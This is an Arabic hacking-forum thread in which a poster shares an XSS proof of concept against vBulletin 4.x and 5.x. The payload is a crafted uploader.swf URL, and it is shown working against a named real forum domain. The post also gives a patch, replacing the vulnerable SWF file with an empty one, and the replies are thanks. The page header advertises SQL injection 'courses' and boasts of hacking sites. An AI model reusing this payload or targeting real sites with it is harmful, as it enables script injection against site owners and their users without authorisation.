1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

[ خبر ] ثغرة Xss تعمل على vBulletin 4.X and 5.X مع الترقيع

الموضوع في 'حماية المواقع والسيرفرات' بواسطة Secuprog, بتاريخ ‏1 مارس 2014.

كاتب الموضوع : Secuprog المشاهدات : 950 الردود : 7 ‏1 مارس 2014
  1. غير متصل

    Secuprog
    rank
    Developer

    عضو منذ:
    ‏24 نوفمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    [​IMG]

    بسم الله الرحمن الرحيم

    السلام عليكم ورحمة الله وبركاته

    ثغرة Xss تعمل على

    vBulletin 4.X and 5.X

    PoC:

    كود PHP:
    Site.com/clientscript/yui/uploader/assets/uploader.swf?allowedDomain=\%22}%29%29%29}catch%28e%29{alert%28document.domain%2 ​9;}//
    كود PHP:
    Site.com/clientscript/yui/uploader/assets/uploader.swf?allowedDomain=\%22}%29%29%29}catch%28e%29{alert%28document.domain%2 ​9;}//
    مثال على الثغره :

    كود PHP:
    www.quadsuk.net/forums/clientscript/yui/uploader/assets/uploader.swf?allowedDomain=\"})))}catch(e){alert(document.domain);}//
    [​IMG]

    ترقيع الثغرة

    لجميع نسخ الجيل الرابع :-

    ابحث عن الملف التالي وقم بحذفه ثم قم بإنشاء ملف فارغ بنفس الاسم


    كود PHP:
    /clientscript/yui/uploader/assets/uploader.swf


    لجميع نسخ الجيل الخامس :-

    ابحث عن الملف التالي وقم بحذفه ثم قم بإنشاء ملف فارغ بنفس الاسم

    كود PHP:
    /core/clientscript/yui/uploader/assets/uploader.swf
    [​IMG]
     


    جاري تحميل الصفحة...
  2. غير متصل

    DEaLeR_HaCKeR
    rankrank
    Developer

    عضو منذ:
    ‏27 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    الإقامة:

    رد: ثغرة Xss تعمل على vBulletin 4.X and 5.X مع الترقيع

    مشكوور حبيبي بارك الله فيك :{y.}
     


  3. غير متصل

    لعنة الهكرز
    rank
    Developer

    عضو منذ:
    ‏12 مارس 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:

    رد: ثغرة Xss تعمل على vBulletin 4.X and 5.X مع الترقيع

    وعليكم السلام ورحمة الله وبركاته
    شكرا على طرح اخى الكريم
     


  4. غير متصل

    ŦђĘ βě$Ţ
    Developer

    عضو منذ:
    ‏4 مارس 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:

    رد: ثغرة Xss تعمل على vBulletin 4.X and 5.X مع الترقيع

    يعطيكَ ألف عافية يآلغـآلي !:"
     


  5. غير متصل

    ~.O M A R.~
    rankrank
    Developer

    عضو منذ:
    ‏16 يوليو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    الإقامة:

    رد: ثغرة Xss تعمل على vBulletin 4.X and 5.X مع الترقيع

    بارك الله فيك يا غالى

    مبدع يا غالى :{1}:
     


  6. غير متصل

    فہٰايہٰروسہٰ
    rankrank
    موقوف لمخالفة الشروط

    عضو منذ:
    ‏25 أكتوبر 2015
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:

    رد: ثغرة Xss تعمل على vBulletin 4.X and 5.X مع الترقيع

    مشكور حبيبي{1!9}
     


  7. غير متصل

    فہٰايہٰروسہٰ الہٰديہٰوانہ موقوف لمخالفة الشروط
    موقوف لمخالفة الشروط

    عضو منذ:
    ‏27 يونيو 2015
    عدد المشاركات:
    الإعجابات المتلقاة:
    511
    نقاط الجائزة:
    الجنس:
    ذكر
    الوظيفة:
    سايق مخده
    الإقامة:

    رد: ثغرة Xss تعمل على vBulletin 4.X and 5.X مع الترقيع

    الله يعطيك العافيه:ُ{1e}:ُ​
     


  8. غير متصل

    !_عبدالله عباس_!
    DeveloPer Plus

    عضو منذ:
    ‏13 نوفمبر 2015
    عدد المشاركات:
    الإعجابات المتلقاة:
    382
    نقاط الجائزة:

    رد: ثغرة Xss تعمل على vBulletin 4.X and 5.X مع الترقيع

    عاشت الايادي يامبدع​


     


مشاركة هذه الصفحة

جاري تحميل الصفحة...